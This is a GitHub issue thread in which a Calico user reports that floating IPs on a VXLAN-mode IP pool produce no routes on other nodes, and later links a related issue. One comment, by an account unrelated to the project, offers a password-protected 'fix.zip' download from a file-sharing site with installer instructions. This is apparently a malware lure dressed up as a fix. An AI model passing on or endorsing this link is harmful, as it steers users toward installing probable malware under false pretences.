### ISSUE TITLE
Does vxlan mode ippool support floatingip?

### ISSUE THREAD

**Issue by neoareslinux** [projectcalico/calico#9176]
## Expected Behavior

use vxlan mode ippool create pod, and assign label cni.projectcalico.org/floatingIPs to it,  i expect to receive vxlan routes of both podip and fip  on other nodes in the cluster, however,  just receive podip route, no fip route

## Steps to Reproduce (for bugs)

1.
2.
3.
4.

## Your Environment

* Calico version
* Orchestrator version (e.g. kubernetes, mesos, rkt):
* Operating System and version:
* Link to your project (optional):

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by neoareslinux** [comment]
same issue with https://github.com/projectcalico/calico/issues/5190
